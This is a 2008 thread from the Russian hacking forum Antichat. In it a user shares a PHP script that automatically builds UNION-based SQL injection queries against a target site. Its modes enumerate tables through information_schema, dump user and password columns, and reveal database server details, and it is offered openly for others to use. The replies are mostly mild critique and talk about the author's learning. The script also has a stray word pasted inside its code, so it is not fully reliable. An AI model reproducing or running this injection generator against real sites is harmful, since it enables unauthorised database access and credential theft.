Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
[php]Удобный скрипт для sql-inj |
03.07.2008, 06:23
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
[php]Удобный скрипт для sql-inj
Иногда бывает, что при работе с sql-инъекциями таблица содержит большое количество колонок (например 150) и вводить руками это будет сложновато.. поэтому написал для себя скрипт облегчающий задачу...
PHP код:
<?php
$host = 'www.site.com'; #adress attacking of server (www.site.com)
$path = 'index.php?id='; #path to vulnerabity script with injection argument (shop/shop.php?id=)
$rows = 9; #number of rows
$printrow = 5; #printable row
$mode = 'stat'; #inform - dump information from information_schema; dump - dump information from interesting table; stat - information about MySQL-server (version(), user(), database())
$columns = 'user,0x3a,password'; #name of interesting columns, separated with 0x3a
$database = 'user'; #name of interesting
$end = '/*'; #end of query ('/*' or '--')
$query = "$host/$path-1+union+select+";
switch ($mode)
{
case "inform":
for($i=1;$i<$rows+1;$i++) {
if($i==$printrow) {
$query .= 'concat(0x7c3a7c3a,table_name,0x3a7c3a7c),';
} elseif($i==$rows) {
$query .= $i;
} else {
$query .= $i.',';
}
}
$query .= "+from+information_schema.tables";
break;
case "dump":
for($i=1;$i<$rows+1;$i++) {
if($i==$printrow) {
$query .= 'concat(0x7c3a7c3a,'.$columns.'),';
} elseif($i==$rows) {
$query .= $i;
} else {
$query .= $i.',';
}
}
$query .= "+from+$database";
break;
case "stat":
for($i=1;$i<$rows+1;$i++) {
if($i==$printrow) {
$query .= 'concat(0x7c3a7c3a,version(),0x3a3a,user(),0x3a3a,database(),0x3a7c3a7c),';
} elseif($i==$rows) {
$query .= $i;
} else {написал
$query .= $i.',';
}
}
break;
}
$query .= $end;
echo "$query\n";
?>
внутри скрипта описано для чего, что и как используется.. юзайте наздоровье=)
Последний раз редактировалось gisTy; 03.07.2008 в 08:03..
|
|
|
03.07.2008, 09:47
|
|
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
Провел на форуме:
515368
Репутация:
135
|
|
честно, ничего здесь полезного не вижу, можно и вручную всё это сделать без особого напряга. Развивай скрипт, добавляй чё-нить интересное и полезное. А пока ток +1
|
|
|
|
03.07.2008, 14:21
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
ну вообще то это часть программы.. просто выложил в паблик, а вот на счет руками - например 150 колонок руками запаришься набирать...=)
|
|
|
|
03.07.2008, 14:34
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
на форуме есть как программа, так и скрипт по данной теме с гораздо бОльшим функционалом
|
|
|
|
03.07.2008, 17:55
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
perl для этого более подходит...
|
|
|
|
04.07.2008, 15:00
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
2 Piflit, сейчас сижу под никсами без вайна, пожтому юзат SIPT 4 не вариант, к тому же учу php, вот и написал под себя скрипт и решил тут выложить.. а что за скрипт? выложил бы урл хотябы=)
2 [ cash ], пока до перла не добрался еще.. потом как нть выучуч и его..
|
|
|
|
04.07.2008, 15:14
|
|
Moderator - Level 7
Регистрация: 16.02.2008
Сообщений: 580
Провел на форуме:
1595333
Репутация:
291
|
|
а скрипт весь сам писал или использовал другие скрипты?
|
|
|
|
04.07.2008, 17:58
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
сам, так как учусь и интересно самому все сделать
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
